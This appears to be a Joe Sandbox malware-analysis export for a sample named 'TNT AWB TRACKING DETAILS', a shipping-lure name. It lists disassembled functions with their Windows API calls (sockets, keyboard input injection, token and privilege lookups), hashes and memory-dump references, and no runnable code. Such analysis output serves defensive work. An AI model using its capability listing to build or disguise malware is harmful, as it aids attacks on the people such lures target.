Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: f8e827dfa38fed670a862f639e904792252eb3c6848c7aa4fa1f7d1fd67fe930
Instruction ID: a1ecbc505bcf42ee802b546344396f526fa157f6f7560b48530c076784b840cf
Opcode Fuzzy Hash: f8e827dfa38fed670a862f639e904792252eb3c6848c7aa4fa1f7d1fd67fe930
Instruction Fuzzy Hash: 5BC15B71608301DFC715DF28C480A6ABBE4FF89714F5489ADF8A99B351D731E946CB81

Function 00B18093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B180C3
CoUninitialize.OLE32 ref: 00B180CE

Part of subcall function 00AFD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFD5D4

VariantInit.OLEAUT32(?), ref: 00B180D9
VariantClear.OLEAUT32(?), ref: 00B183AA

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 3072298656a415730bc1feed56f04501c06bfc4d5f1e847bdbeb084c32b68123
Instruction ID: 0f782fc0e40c5562af3fbd499eb48073e8f1932ad6c69a3b0e26827b45cce9aa
Opcode Fuzzy Hash: 3072298656a415730bc1feed56f04501c06bfc4d5f1e847bdbeb084c32b68123
Instruction Fuzzy Hash: 65A178756047019FCB00DF64C981B6AB7E4FF8A324F548498F9969B3A1CB34ED45CB86

Function 00AF7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7702
CLSIDFromProgID.OLE32(?,?,00000000,00B2FB80,000000FF,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7727
_memcmp.LIBCMT ref: 00AF7748

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 7eafccc15d6ef2e8cc54d4d699f15af6ee10a0a359a599475f5f3c6d5b40610d
Instruction ID: 20bfe64bdca0915d7d4862afe77616a2c6d3b0406de0146fefed285513191189
Opcode Fuzzy Hash: 7eafccc15d6ef2e8cc54d4d699f15af6ee10a0a359a599475f5f3c6d5b40610d
Instruction Fuzzy Hash: 1B81C775A00109EFCB04DFE8C984EAEB7B9FF89315B204598F505AB250DB71AE06CB60

Function 00AF687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AF688E
SysAllocString.OLEAUT32(00000000), ref: 00AF6937
VariantCopy.OLEAUT32 ref: 00AF6966
VariantClear.OLEAUT32(?), ref: 00AF698D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 24b594156cf9578db1c2cb61c8f78ce73f8f5df96239e729011127ecc0e7036b
Instruction ID: 95649038081597fcfd35b8cdf09229100139fc7747d9fc8b8a37a59df2bc992a
Opcode Fuzzy Hash: 24b594156cf9578db1c2cb61c8f78ce73f8f5df96239e729011127ecc0e7036b
Instruction Fuzzy Hash: 9251AF7470070ADADB24AFA5D891A3AF3F9AF45350F20D81FF696DB291DB70D8408711

Function 00B0955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00AA4EE5: _fseek.LIBCMT ref: 00AA4EFD

Part of subcall function 00B09734: _wcscmp.LIBCMT ref: 00B09824
Part of subcall function 00B09734: _wcscmp.LIBCMT ref: 00B09837

_free.LIBCMT ref: 00B096A2
_free.LIBCMT ref: 00B096A9
_free.LIBCMT ref: 00B09714

Part of subcall function 00AC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9A24), ref: 00AC2D69
Part of subcall function 00AC2D55: GetLastError.KERNEL32(00000000,?,00AC9A24), ref: 00AC2D7B

_free.LIBCMT ref: 00B0971C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 1fde2ba84177b8a697f23fbc2787d02ee922283ffbc6cb6e98aac0cff4e802ce
Instruction ID: 57a3e7bfdf476db63eac01b6ab124083f44a9c2f0adc5fe18b2469b9493e8d32
Opcode Fuzzy Hash: 1fde2ba84177b8a697f23fbc2787d02ee922283ffbc6cb6e98aac0cff4e802ce
Instruction Fuzzy Hash: 3B5141B1D14258AFDF259FA4CC81A9EBBB9EF88300F10449EF509A3291DB715E80CF58

Function 00B297F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(013FEB50,?), ref: 00B29863
ScreenToClient.USER32(00000002,00000002), ref: 00B29896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B29903

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 19c4aac426d69d4a488c01651e2b72ab052edb4dcfa371d199a058988a882f5e
Instruction ID: f964732a050dd0e1de6bbfacf91c2f17e7fecba6c2b31bdb0dfa8544d00b3ae2
Opcode Fuzzy Hash: 19c4aac426d69d4a488c01651e2b72ab052edb4dcfa371d199a058988a882f5e
Instruction Fuzzy Hash: 81512E74A00219EFCF24CF58D984AAE7BF5FF45360F1481A9F8599B2A0D731AD91CB90

Function 00AF9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00AF9AD2
__itow.LIBCMT ref: 00AF9B03

Part of subcall function 00AF9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00AF9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00AF9B6C
__itow.LIBCMT ref: 00AF9BC3

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 048f709c5a089d0fea179b4aa8789bc9a0a874433b44f5fe3ea73eb043a34c81
Instruction ID: 0774a094f59c38f5a19026dbdc847f6f3c686d5f338913584b436e049b5690a3
Opcode Fuzzy Hash: 048f709c5a089d0fea179b4aa8789bc9a0a874433b44f5fe3ea73eb043a34c81
Instruction Fuzzy Hash: 02417C70A0020CABDF25EF94D945BFF7BB9EF45760F000069FA05A7291DB709A45CBA1

Function 00B169AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B169D1
WSAGetLastError.WSOCK32(00000000), ref: 00B169E1

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B16A45
WSAGetLastError.WSOCK32(00000000), ref: 00B16A51

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 40f305e7e21676600c74373ececbae9a48477299e76c5092e4b8e6857a276005
Instruction ID: bd0be134f5307a5a96ca0576347d846ef33b29e8d5004068fd355f8fce3fc7fa
Opcode Fuzzy Hash: 40f305e7e21676600c74373ececbae9a48477299e76c5092e4b8e6857a276005
Instruction Fuzzy Hash: 8841C135700200AFEB21AF24CD86F7A77E8DF09B10F448068FA19AF2D2DB789D018791

Function 00B1641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B2F910), ref: 00B164A7
_strlen.LIBCMT ref: 00B164D9

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 4fb52df846c665862c6358587163661f4ccd9d7003fae972855cf7eb889423ed
Instruction ID: 245bada6499fe4db5fa27a0eadd6bd1a8b2436d7ea7d41b4d0cea6114f74deb6
Opcode Fuzzy Hash: 4fb52df846c665862c6358587163661f4ccd9d7003fae972855cf7eb889423ed
Instruction Fuzzy Hash: DD417E31A00108ABCB14EBA8DD95FFEB7E9AF15310F5481A9F9199B2D2DB30AD45CB50

Function 00B0B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B0B89E
GetLastError.KERNEL32(?,00000000), ref: 00B0B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B0B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B0B915

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: d064ef2405052057a598a3d94c723865653fce18e2827b672b5987ff941c1d3f
Instruction ID: dcae3464401ee4e72dc899e37b4c3e5e621094e97d0cdac7c51da55eeb3eea39
Opcode Fuzzy Hash: d064ef2405052057a598a3d94c723865653fce18e2827b672b5987ff941c1d3f
Instruction Fuzzy Hash: 2F412C35600611DFCB11EF15C584A5ABBF5EF8A710F098098ED4A9B3A2CB34FD01CB91

Function 00B28851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B288DE

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 682adbe7ad92e635b1c753c568127ba0338a4669343663415d45665fe2a80589
Instruction ID: 14685ca9da466944770103000b2f1a5acb36433dfcc3c01bdf91228a99adadbe
Opcode Fuzzy Hash: 682adbe7ad92e635b1c753c568127ba0338a4669343663415d45665fe2a80589
Instruction Fuzzy Hash: 6B31F434602128AFEF309A58EC85FB837E5EB09310F544592F959EB1E1CE74D990DB52

Function 00B2AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B2AB60
GetWindowRect.USER32(?,?), ref: 00B2ABD6
PtInRect.USER32(?,?,00B2C014), ref: 00B2ABE6
MessageBeep.USER32(00000000), ref: 00B2AC57

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 48e2af6114780a24c3a11fa09462dc4c88bf77d212ec22da95b8d1f2da7f23ee
Instruction ID: 73a8a612333adc4c2e580131fab44e015f014ee956f5a0405ee0d224c9cd5af5
Opcode Fuzzy Hash: 48e2af6114780a24c3a11fa09462dc4c88bf77d212ec22da95b8d1f2da7f23ee
Instruction Fuzzy Hash: 5E416D30600129DFCB21DF58E894B69BBF5FB89710F1880E9E859DB264DB70A941CB92

Function 00B00AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B00B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00B00B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B00BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B00BFB

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: e23478369b8d78cba537c9e4fe421b3d175c95aad0b696d73a4a2c3e26da9dd4
Instruction ID: 569b14c9df9da46aaa079f7c0138725c4c3c051a2aed5a87a12d699e402ca4cd
Opcode Fuzzy Hash: e23478369b8d78cba537c9e4fe421b3d175c95aad0b696d73a4a2c3e26da9dd4
Instruction Fuzzy Hash: 3E313830D60218AEFF31AB698C05BFABFE9EB45318F0843EAF591521D1C7B589419751

Function 00B00C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00B00C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B00C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B00CE1
SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00B00D33

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 7438c2dc16ebe30672b9873443b37679bc08dbac33f7122932227e45e6cf6f9d
Instruction ID: ba7c1a29bd51d0b71e7fb25d20a7da22927b831d603357576e347037f2b3e9ad
Opcode Fuzzy Hash: 7438c2dc16ebe30672b9873443b37679bc08dbac33f7122932227e45e6cf6f9d
Instruction Fuzzy Hash: 783146309102186EFF34AB648814BFEBFF6EB45310F0443ABE881521D1C37599558761

Function 00AD61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AD61FB
__isleadbyte_l.LIBCMT ref: 00AD6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD628D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 22f728bd83f8cee26e86fe74a194a9fd5d7298db9f76566de9dd8eb40515a73e
Instruction ID: da77085f4a880597870bebe753a4747920c654c4fa9773a7fbabcc4cf6416644
Opcode Fuzzy Hash: 22f728bd83f8cee26e86fe74a194a9fd5d7298db9f76566de9dd8eb40515a73e
Instruction Fuzzy Hash: 3D31EF31A00246EFEF218F65CC45BBA7BB9FF41310F15412AF866972A1EB30E950DB90

Function 00B24EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B24F02

Part of subcall function 00B03641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B0365B
Part of subcall function 00B03641: GetCurrentThreadId.KERNEL32 ref: 00B03662
Part of subcall function 00B03641: AttachThreadInput.USER32(00000000,?,00B05005), ref: 00B03669

GetCaretPos.USER32(?), ref: 00B24F13
ClientToScreen.USER32(00000000,?), ref: 00B24F4E
GetForegroundWindow.USER32 ref: 00B24F54

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: a144e46039eb9826107ee01d348bbe378e00602f8582a91a668bb77a15b5eab4
Instruction ID: 2d5099d184abfdc1f9493c2a4e29dd9a1dfbf9b3c2df004aa2f21328d02fd31f
Opcode Fuzzy Hash: a144e46039eb9826107ee01d348bbe378e00602f8582a91a668bb77a15b5eab4
Instruction Fuzzy Hash: 28313E72D00108AFDB10EFA5C9859EFB7FDEF99300F10406AE415E7241DB759E458BA0

Function 00B2C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

GetCursorPos.USER32(?), ref: 00B2C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ADB9AB,?,?,?,?,?), ref: 00B2C4E7
GetCursorPos.USER32(?), ref: 00B2C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ADB9AB,?,?,?), ref: 00B2C56E

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5b6ab3a922598e1a952dcb6602536d3a06e7dcc8d49e3a670c89ed48baf72bf6
Instruction ID: ae8d04b703e0fb4523b4df31ae19c5c04c7f0da379e9af6fbd371b76a4e9e96e
Opcode Fuzzy Hash: 5b6ab3a922598e1a952dcb6602536d3a06e7dcc8d49e3a670c89ed48baf72bf6
Instruction Fuzzy Hash: DC319335500028AFCB25CF58D859EBE7FF5EB49350F0440A5F9098B2A1CB35AD61DBA4

Function 00AF8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8121
Part of subcall function 00AF810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF812B
Part of subcall function 00AF810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF813A
Part of subcall function 00AF810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8141
Part of subcall function 00AF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AF86A3
_memcmp.LIBCMT ref: 00AF86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AF86FC
HeapFree.KERNEL32(00000000), ref: 00AF8703

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
